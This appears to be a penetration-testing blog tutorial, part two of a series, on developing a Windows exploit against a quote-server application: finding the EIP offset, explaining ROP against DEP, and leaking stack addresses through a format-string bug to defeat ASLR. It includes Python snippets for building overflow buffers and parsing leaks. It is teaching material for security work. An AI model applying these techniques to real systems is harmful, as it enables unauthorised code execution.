Cybersecurity Consulting
February 21, 2024
20 minute read
Written by Nathan Golick, Senior Penetration Tester at DOT Security
[Editor’s Note: This is the second in a series of three guest posts that describe, in technical detail, the exploit development process on a 32-bit Windows Operating System. Part 1 covered how to crash the application.]
This blog will focus on the theory of overcoming various Windows mitigations: data execution prevention (DEP) through return-oriented programming (ROP) and address space layout randomization (ASLR) through information leakage.
It will also walk you through the steps required to find the information leak, how to turn it into a usable base address for the target application, and why this technique is important.
Before we dive into learning about Windows mitigations, some initial work needs to be done in the debugger to determine the offset required to overwrite the extended instruction pointer (EIP) with a specific value.
Later in this process, a memory address will be placed here to initiate the ROP chain, but for now, we need to figure out exactly how many bytes are needed to overflow the instruction pointer.
To accomplish this, two tools will be used:
msf-pattern_create generates a cyclic pattern of a set size. Any four consecutive bytes occur only once in the pattern, so when it is fed into the application, the value that lands in EIP identifies a single position in the buffer.
msf-pattern_offset, as its name implies, takes the value retrieved from EIP, searches the original pattern, and outputs the offset where it occurs.
Figure 01: Pattern create
The -l flag is used to specify the length of the pattern. In this case, 3000 bytes are generated and will be placed into the POC buffer with the variable name pattern. This pattern will be inserted into the buffer following the opcode.
Listing 01: POC with pattern
Re-run the exploit while the debugger is attached and running. This will cause a crash; note the value in the EIP register.
Figure 02: EIP value
Passing the value of EIP 37714336 into msf-pattern_offset produces the expected result of 2060 bytes as determined in the previous post.
Figure 03: Offset
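To make the pattern logic concrete, here is a minimal Python sketch of what the two Metasploit tools do. It is a re-implementation for illustration, not the tools themselves; the function names pattern_create and pattern_offset are chosen here, and the sketch assumes the default upper/lower/digit character sets.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length: int) -> str:
    """Build a Metasploit-style cyclic pattern (Aa0Aa1Aa2...) cut to `length`."""
    pattern = ""
    # product() varies the digit fastest, then the lowercase letter, then the uppercase one.
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(pattern) >= length:
            break
        pattern += upper + lower + digit
    return pattern[:length]


def pattern_offset(eip_value: int, length: int = 3000) -> int:
    """Return the offset of the four bytes found in EIP, or -1 if absent."""
    # x86 is little-endian, so the bytes in the buffer are the register value reversed.
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern_create(length).find(needle)


print(pattern_offset(0x37714336))  # EIP value from the crash; prints 2060
```

The EIP value 37714336 corresponds to the ASCII bytes 6Cq7 in memory order, which is why the search is done on the byte-reversed value.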
Now we need to set up the buffer in our proof of concept exploit to verify the calculated offset values are correct. If we performed the previous steps correctly, it should be possible to place any arbitrary DWORD into EIP. The buffer will be set up as follows:
Listing 02: Buffer setup
With this setup, EIP is expected to contain 42424242, since 0x42 is the hexadecimal representation of the ASCII character B. Note that 3000 is arbitrary here; it was chosen to ensure there is ample space for shellcode to be placed after the overwrite.
Listing 03: Updated buffer
Re-running the updated exploit produces the expected result, with 42424242 being placed in EIP.
Figure 04: EIP overwrite
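The layout described above can be sketched roughly as follows. This is an assumption-laden illustration, not the POC from the listings: the opcode is left as a parameter because its value comes from Part 1, the filler and padding characters are arbitrary, and the name build_overwrite_buffer is hypothetical.

```python
import struct

OFFSET_TO_EIP = 2060  # offset reported by msf-pattern_offset
PAYLOAD_SIZE = 3000   # arbitrary; leaves room for shellcode after the overwrite


def build_overwrite_buffer(opcode: int, eip: bytes = b"B" * 4) -> bytes:
    """Opcode DWORD, filler up to the offset, the EIP overwrite, then padding."""
    filler = b"A" * OFFSET_TO_EIP
    padding = b"C" * (PAYLOAD_SIZE - len(filler) - len(eip))
    # Assumption: the opcode is sent as a little-endian DWORD ahead of the payload.
    return struct.pack("<I", opcode) + filler + eip + padding
```

Swapping the default eip argument for a packed memory address is all that changes later, when the four B characters are replaced by the first ROP gadget.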
Now that we have gained control over the instruction pointer, it's time to learn about some of the mitigations the Windows OS has placed in our way.
If you are familiar with a standard stack-based buffer overflow, this would be the point to place some shellcode into the buffer and overwrite EIP with a jmp esp instruction. However, we are leveling up our skills and must contend with data execution prevention and address space layout randomization, which will be discussed in the next section.
Data execution prevention (DEP) was created to stop the traditional attack vector by changing the permissions of the stack to be non-executable. This means that even if we place shellcode onto the stack and jump to it, the application doesn’t have permission to run it as code. The application will crash with an access violation.
Return-oriented programming (ROP) is a technique that involves chaining together several existing instructions in the target application to accomplish the task of calling a Windows API that can set or change memory permissions.
Recall that we currently have the ability to overwrite EIP with an arbitrary value. If we place several memory addresses onto the stack, and each of these addresses points to existing instructions that end with a ret instruction, the application will happily jump to each address in order. This works because when the application encounters a ret, it pops the next value off the stack and continues execution from there.
These small chunks of code are referred to as gadgets. Each gadget individually may only move a value into a register or write a value to the stack, but collectively, they can set up an API call that sets a memory region as executable and can jump into that area. ROP chains are very powerful and their functionality is only limited by the opcodes available in the target application (and bad bytes in memory addresses).
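The control flow of a ROP chain can be modeled with a toy Python simulation. Nothing here touches real memory: the gadget addresses, the gadget bodies, and the run_chain helper are all hypothetical, and the point is only to show how each ret pulls the next address off the stack.

```python
def run_chain(stack, gadgets):
    """Toy model: every `ret` pops the next DWORD and jumps to that gadget."""
    regs = {"eax": 0, "ecx": 0}
    stack = list(stack)  # index 0 is the top of the stack
    trace = []
    while stack:
        address = stack.pop(0)           # what `ret` does: pop into EIP
        name, body = gadgets[address]
        body(regs, stack)                # a gadget may pop its own operands
        trace.append(name)
    return regs, trace


# Hypothetical gadgets, for illustration only.
GADGETS = {
    0x1000: ("pop eax ; ret", lambda r, s: r.update(eax=s.pop(0))),
    0x2000: ("pop ecx ; ret", lambda r, s: r.update(ecx=s.pop(0))),
    0x3000: ("add eax, ecx ; ret",
             lambda r, s: r.update(eax=(r["eax"] + r["ecx"]) & 0xFFFFFFFF)),
}

# Addresses and data values are interleaved on the stack, as in a real chain.
chain = [0x1000, 0x40, 0x2000, 0x02, 0x3000]
regs, trace = run_chain(chain, GADGETS)
print(trace, hex(regs["eax"]))
```

Each gadget does very little on its own, but three of them together load two values and add them, which is the same principle used to stage the arguments of an API call.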
One way to bypass DEP with ROP is to change the memory permissions of a specific region with the Windows API VirtualAlloc. Per the Windows documentation, VirtualAlloc “reserves, commits, or changes the state of a region of pages in the virtual address space of the calling process.” VirtualProtect or WriteProcessMemory are also viable options, but for this walkthrough, we will stick with VirtualAlloc.
Using ROP to change the memory permissions of the shellcode region so that it can execute sounds like a solid plan. Simple, right? Well, not quite. Successfully chaining together ROP gadgets relies on the memory addresses we use always being the same and pointing to the same assembly instructions.
Operating system designers recognized this and began working on another mitigation to randomize memory addresses at runtime.
At a high level, address space layout randomization (ASLR) randomizes the base address of an EXE or DLL in memory each time the application starts. This means that a carefully constructed ROP chain would be rendered useless, as none of the memory addresses point to the right assembly instructions anymore.
There are four main options to bypass ASLR:
While these techniques may offer varying degrees of success, we will be focusing on exploiting an information leak for this walkthrough.
If we can find another bug in the target application that reliably leaks memory addresses and we can return that information to our attacking system, it would allow us to calculate base addresses at run time. So, no matter what the base address is randomized to, we would be able to retrieve this address and feed it into our ROP chain. This would fix the problem presented with hardcoding memory addresses into the chain.
With a lot of theory out of the way, let's dive back into IDA and see if we can find an information leak.
Before we begin looking for an exploitable information leak, we need to understand how the application can send data back to the attacker machine. Recall the application has a few different functions. These include:
The get_quote function sounds like a reasonable place to start our analysis.
The get_quote function can be accessed with case 901, which corresponds to opcode 0x385 (901 in hexadecimal). This block can be found at QuoteDB + 0x187F. Jump to this location in IDA; it should look like Figure 05.
Figure 05: Case 901
This block loads the address of the beginning of the buffer into EAX. It then increments the address by 4, so that it points to the next value in our buffer, and stores this value in var_803C. Next, a bounds check compares the second value in the input buffer with the number of quotes in the database. If the second buffer value is below the total number of quotes, the bounds check passes. In other words, the program is checking that we are asking for a quote index that exists in its database.
Let's verify these assertions with dynamic analysis. Listing 04 shows the updated buffer contents in the POC.
Listing 04: get_quote buffer setup
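A request of this shape can be sketched in Python as follows. It is an illustration under stated assumptions rather than the POC itself: the opcode and index are assumed to be packed as consecutive little-endian DWORDs, and the helper names build_get_quote and passes_bounds_check are hypothetical.

```python
import struct

GET_QUOTE_OPCODE = 0x385  # case 901


def build_get_quote(index: int) -> bytes:
    """First DWORD selects the operation, second DWORD is the quote index."""
    return struct.pack("<II", GET_QUOTE_OPCODE, index)


def passes_bounds_check(index: int, num_quotes: int = 10) -> bool:
    """Model of the cmp/jb pair: an unsigned 'below' comparison."""
    return (index & 0xFFFFFFFF) < num_quotes


print(build_get_quote(1).hex())
```

Because jb is an unsigned comparison, a negative index reinterpreted as a large DWORD fails the check in this model, just as an index of 10 or more does.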
Set a breakpoint at QuoteDB + 0x1888 in WinDbg and send the updated buffer. As expected, the second buffer value is dereferenced and placed into EAX.
Figure 06: Quote index
Continuing execution to QuoteDB + 0x1896, the variable IDA called _num_quotes is moved into EDX. We can verify this value is 0x0a, which is 10 in decimal.
Figure 07: Number of quotes
If you would like to verify this is an accurate count (assuming no additional quotes have been added yet), navigate back to the main function, and enter the _start_server function. This is where the application initially populates the database with quotes, and there are indeed 10 of them.
Figure 08: Quote database initialization
Getting back to the task at hand, moving execution forward to the cmp statement, we can see that our value of 0x01 is indeed below the number of quotes 0x0a, and execution flows to the next code block which contains our target function call get_quote.
Figure 09: Taking the jb jump
With execution moving to the next block, we see a malloc call, then the call to our target function get_quote, and finally a memcpy call. malloc is used to allocate a chunk of memory, in this case 0x800 bytes, and returns a pointer to that memory chunk in EAX. This pointer is stored in the Src variable and then saved to the stack.
Note the quote_index variable is also placed on the stack before the get_quote call. This indicates that the newly allocated memory region and our quote_index are the parameters to the get_quote function call.
Figure 10: get_quote block
Immediately after the get_quote function, the value in EAX is stored in the Size variable. This indicates the return value from get_quote is the length of the quote.
Listing 05 provides the prototype of the memcpy function. This function copies data from the location pointed to by src to the location pointed to by dest, for a total of count bytes.
Listing 05: memcpy function prototype
The Src variable, which was just an empty allocated memory chunk, is now being used as the source for the memcpy call. Presumably, it holds the quote from get_quote; we will verify this with dynamic analysis shortly.
Finally, var_8034, the destination address for the memcpy, is placed on the top of the stack. Keep this variable in mind; it will be important later.
A high-level overview of this code block:
malloc: allocate a chunk of memory
get_quote: retrieve a quote -> save quote to allocated memory, return length of quote
memcpy: copy the quote from allocated region to var_8034
Listing 06: Code block overview
Now that we have a better understanding of the code surrounding get_quote, it is time to dig into the function itself and uncover another bug in the application.
Figure 11: get_quote function
There is a lot going on in this function, but I have added some comments to clarify some of the surrounding instructions.
After setting up a print to console with the quote number, the application takes the index value and performs a shl operation. This is a bitwise shift left, which moves the bits of the first operand to the left by the number of positions given in the second operand; each position shifted doubles the value.
In this case, the index, which is 0x01, is shifted left by 0x0b or 11 in decimal. This results in 0x800 being placed in EAX. This operation is performed to calculate the offset into the quotes database, as each quote is allocated 0x800 bytes. So index 2 would equal 0x1000, which would be the third quote in the database; recall the index starts at 0.
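The index-to-offset arithmetic is easy to check in Python. The sketch below only mirrors the shl instruction; the constant and function names are chosen here for illustration.

```python
QUOTE_SLOT_SHIFT = 0x0B  # shl eax, 0Bh: each quote slot is 1 << 11 = 0x800 bytes


def quote_offset(index: int) -> int:
    """Offset of a quote inside the database, truncated to 32 bits like EAX."""
    return (index << QUOTE_SLOT_SHIFT) & 0xFFFFFFFF


for index in range(3):
    print(index, hex(quote_offset(index)))
```

Shifting left by 11 is the same as multiplying by 0x800, which is why the compiler can use a single shl instead of a multiplication.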
Let's get WinDbg caught up to this location in IDA and verify our assertions. Set a breakpoint at QuoteDB + 0x158E and run the POC. This instruction will load our quote_index into EAX as expected.
Figure 12: Loading quote_index into EAX
Single step over the shl instruction and note the value in EAX.
Figure 13: Index left shift
As expected, EAX contains 0x800, and it is used in the next instruction, lea, which loads the effective address of the second operand into the first. In this case, it retrieves the address of the desired quote and places it in EDX.
The next few instructions I want to explore are the setup and call to snprintf. snprintf writes formatted data to a string. We will first understand how it works, then take a brief detour into format strings, and finally see if we can understand how this function could be abused to bypass ASLR.
We bring execution in WinDbg to QuoteDB + 0x159F and verify EDX contains the quote by using da to display the ASCII representation of the data at that memory address.
Figure 14: Quote in EDX
This address is written to the stack and is referenced in Figure 11 as Format in the second red box. Then a hardcoded BufferCount is written to the stack, and finally, the memory address of the memory region created by malloc is written to the stack.
Listing 07: snprintf function prototype
Listing 07 shows the snprintf function prototype. I have moved execution to QuoteDB + 0x15AE, which is just prior to the snprintf call, used dds to dump the stack, and labeled the parameters.
Figure 15: snprintf arguments
With this setup, we would expect the quote stored in format to be written to the memory address in buffer, up to the maximum number of bytes given by count. Step over the call and verify this by dumping the buffer address as DWORDs and as ASCII.
Figure 16: snprintf results
The function completed successfully and snprintf wrote the quote to the memory address as expected.
This code block will then get the length of the quote with the strlen function and return to the previous block. Here it performs a memcpy from the Src variable, which is the quote, to the variable var_8034. The size of the copy is the length of the quote.
Two code blocks lower, we see a send function and the variable var_8034 is being placed onto the stack as a buffer. This looks like the quote we specified will be sent back to the attacking machine.
Figure 17: Send function
Let's verify this by updating our POC a bit to allow the server to send data back to us, and print it to the console.
Listing 08: Updated POC code to handle response
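One way to send a request and capture the reply is sketched below. The function names, the 4096-byte receive size, and the timeout are assumptions made for this example, and the server's host and port are left as parameters rather than guessed.

```python
import socket


def send_and_receive(sock: socket.socket, payload: bytes, max_bytes: int = 4096) -> bytes:
    """Send the request on a connected socket and return one chunk of the reply."""
    sock.sendall(payload)
    return sock.recv(max_bytes)


def query_server(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Open a TCP connection, exchange one request/response pair, then close."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return send_and_receive(sock, payload)
```

A single recv call is enough for short quotes; a longer reply might need a loop that keeps reading until the server closes the connection.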
Let’s verify this is working by closing WinDbg, restarting the application, and sending the exploit POC. Note I manually changed the quote index in the POC between runs to print various quotes.
Figure 18: Server responses
How is retrieving quotes from the database supposed to help us bypass ASLR? Let’s take a quick detour into what format strings are with a code example.
Listing 09: C format string example
Hex: ff, Integer: 255
Listing 10: Format String output
Listing 09 shows an example call to snprintf that uses the string "Hex: %x, Integer: %i". The percent signs followed by characters in this string are called format specifiers, and there are several to choose from.
Their purpose is to translate data into a specific format; this can be floating-point values, integers, hex values, pointers, etc. In this example, the value number that initially holds 255 is formatted into a hex value and an integer value using %x and %i respectively.
Listing 10 shows the output if this example was to be compiled and executed. Note the variable number is never changed to hold the value ff, but with the power of format specifiers and snprintf, the output buffer contains the representation of 255 in hexadecimal.
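Python's % operator follows the same printf-style conventions, so the behavior can be reproduced without a C compiler. This is only an analogue of the C call, not the listing itself.

```python
number = 255

# %x renders the value in hexadecimal, %i as a signed decimal integer.
buffer = "Hex: %x, Integer: %i" % (number, number)

print(buffer)  # Hex: ff, Integer: 255
```

One difference matters for what follows: Python raises an error when specifiers outnumber the supplied values, whereas C's snprintf has no way to count its variadic arguments.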
Now that we know a bit about how format strings work, let's do a little thought experiment. What would happen if we tried to print "Hex: %x, Integer: %i" but didn’t include any variables for it to format? Recall that these are optional parameters and the function has no way to count how many were actually supplied, so the call will still go ahead.
Listing 11: Hypothetical snprintf call
This function call would begin to write arbitrary data as it pulls whatever is on the stack and attempts to format it.
Let's take this thought experiment one step further. What would happen if the function call looked like this?
Listing 12: Second hypothetical snprintf call
This is twenty hexadecimal format specifiers without any values for the function to format. In theory, this would grab twenty DWORD values off the stack and place them into the buffer variable.
These stack values could contain any arbitrary data, but they may also contain memory addresses that reside in the target application. If we can leak an address from the QuoteDB module itself and mask off the lower 2 bytes, we have just obtained the base address of the application. This works as long as the leaked address sits within the first 0x10000 bytes of the module, since Windows aligns module base addresses to 64 KB boundaries.
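The way a variadic formatter ends up reading the stack can be modeled with a toy function. This is a simulation only: toy_snprintf is a hypothetical helper, the dot separator is an assumption, and the stack contents are invented apart from 0x00fb173b, which is the kind of module address an attacker hopes to find.

```python
import re


def toy_snprintf(fmt: str, args, stack) -> str:
    """Toy model: once the real arguments run out, each %x consumes the
    next DWORD that happens to sit on the stack."""
    values = iter(list(args) + list(stack))
    return re.sub(r"%x", lambda _match: format(next(values), "x"), fmt)


# Hypothetical stack contents, for illustration only.
STACK = [0x0000000A, 0x7FFDE000, 0x00FB173B, 0x00000800]

fmt = ".".join(["%x"] * 4)          # "%x.%x.%x.%x"
leaked = toy_snprintf(fmt, [], STACK)
print(leaked)
```

With no real arguments supplied, every specifier is satisfied from the stack, so the formatted string hands those values straight back to whoever reads the buffer.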
This allows us to bypass ASLR because, no matter what the base address of the application is randomized to at runtime, we can leak a memory address and calculate the base address from it.
With a base address, we can return to our DEP bypass technique of return-oriented programming and build a ROP chain based on the base address of the module and some offset.
It is important to understand that, while the base address of each application is randomized, the offset to every instruction within that application remains the same.
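The relationship between a leaked address, the base address, and a fixed offset can be sketched as follows. The helper names are hypothetical, the second leaked value is invented to stand in for a different randomized run, and the mask assumes the leaked address lies within the first 0x10000 bytes of the module.

```python
MODULE_ALIGNMENT_MASK = 0xFFFF0000  # clears the lower 2 bytes

SNPRINTF_CALL_OFFSET = 0x15AE       # QuoteDB + 0x15AE, the snprintf call site


def base_from_leak(leaked: int) -> int:
    """Recover the module base by masking off the lower 2 bytes."""
    return leaked & MODULE_ALIGNMENT_MASK


def rebase(base: int, offset: int) -> int:
    """Resolve a fixed offset against whatever base this run was given."""
    return base + offset


# Second value is a hypothetical leak from another run with a different base.
for leaked in (0x00FB173B, 0x0123173B):
    base = base_from_leak(leaked)
    print(hex(base), hex(rebase(base, SNPRINTF_CALL_OFFSET)))
```

The base differs between the two runs, but the offset added to it never changes, which is what lets a ROP chain be written once in terms of offsets and resolved at run time.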
So, with a hypothetical ASLR bypass in hand, how do we prove this theory? We need to control the buffer that is passed to the snprintf function and input our string of %x’s. Luckily, this application has another function called add_quote that should allow us to do just that.
Repeating the reverse engineering process as discussed for previous functions, we learn that it's possible to add quotes to the database by passing the string in as part of the buffer. In our case, we want to pass in format specifiers.
The exploit POC code has been updated to reflect the required buffer to add a quote that contains a string of hexadecimal format specifiers. I have also segmented the different application operations into functions to make the final exploit more readable.
Listing 13: add_quote function to set up ASLR bypass
Listing 14 is the full exploit POC so far. It is able to interact with the application to add a quote of format specifiers and read that quote back, exploiting the snprintf call without any optional parameters. This results in values already on the stack being placed in the destination buffer and sent back to the user.
Listing 14: POC so far, adds a quote and leaks stack addresses
Running this POC without the debugger attached should result in output that looks something like Figure 19.
Figure 19: Stack leaks
While this may look like a jumbled mess of output, let's take a look under the debugger and see how this actually works.
Let's once again open the application and attach WinDbg. Set a breakpoint at QuoteDB + 0x15AE, which is the call to snprintf, run the exploit, and dump the stack to examine the function call parameters.
Figure 20: Stack setup for function call
Figure 20 shows how the stack is set up just prior to the snprintf function call. There are three parameters as expected for the destination buffer, size, and format string. However, now the format string contains format specifiers, as shown in Figure 21.
Figure 21: Format specifiers
Because no parameters have been supplied to be formatted by the snprintf function, we would expect it to assume the values on the stack were intended to be used as these parameters.
Step over the function call and dump the destination buffer as ASCII with da.
Figure 22: Information leak of stack addresses
This buffer now contains the “unrelated stack data” from Figure 20. Let execution continue with g in WinDbg and check the terminal for a server response.
Figure 23: Server response
Now that we are able to leak arbitrary data from the stack at runtime, all that is left is to parse out the data we want and subtract the offset to turn it into the application’s base address.
With our ultimate goal of creating a ROP chain in mind to bypass DEP, we must choose a module to create gadgets from. For this walkthrough, the QuoteDB application itself will be chosen.
If a module is chosen that is not packaged with the target application, such as a native Windows DLL, this can reduce the portability of the exploit as these files can change between Windows versions and break the ROP chain.
Notice in Figure 20 there are two addresses that reside in the QuoteDB application.
00fb173b QuoteDB+0x173b
00fb18fb QuoteDB+0x18fb
Listing 15: QuoteDB addresses on the stack
Either of them can be used to calculate the base address of the application itself and there are several ways to do this.
Below is the way I chose to do it with the first address: decode the server response as ASCII, subtract the offset (0x173b), and print the base address as hexadecimal.
Listing 16: Parsing code in POC
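A parsing step along these lines might look like the sketch below. It is not the author's parsing code: it assumes the leaked values come back as hexadecimal text separated by dots, it locates the QuoteDB address by its low 16 bits instead of by a fixed position, and the sample response is invented for the example.

```python
LEAK_OFFSET = 0x173B  # the leaked address is QuoteDB + 0x173b


def parse_base_address(response: bytes, separator: str = ".") -> int:
    """Decode the reply as ASCII, find the QuoteDB address, subtract its offset."""
    fields = response.decode("ascii", errors="replace").split(separator)
    for field in fields:
        try:
            value = int(field, 16)
        except ValueError:
            continue  # skip anything that is not a hex number
        if (value & 0xFFFF) == LEAK_OFFSET:
            return value - LEAK_OFFSET
    raise ValueError("no QuoteDB address found in response")


# Hypothetical server response, for illustration only.
sample = b"a.7ffde000.fb173b.800"
print(hex(parse_base_address(sample)))
```

Matching on the low 16 bits is a convenience for this sketch; if the position of the address in the response is stable, indexing the field directly is simpler.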
This results in the following output from the POC:
Figure 24: QuoteDB base address
We can verify this in WinDbg with the lm command, which will list all modules.
Figure 25: Loaded modules
These addresses match! We now have the ability to bypass ASLR and can resolve any address in the target application. This will be necessary in the next part of the walkthrough where we will create a ROP chain to bypass DEP and gain code execution on the target server.
The final post in this series will be published on Wednesday, February 28th.
Nathan is a day-one employee of DOT Security, working with the team for over three years and performing network penetration tests since before DOT Security officially spun off Impact Networking. He provides clients with an in-depth look at their environment from an attacker’s point of view, sharing actionable advice to secure their networks from the ever-present threat of bad actors. Nathan specializes in facets of offensive security like Active Directory penetration testing, malware development, binary exploitation, and AV/EDR evasion. In his free time, Nathan is an avid golfer, likes playing flight simulators, and enjoys learning new techniques to further his skillset as a penetration tester.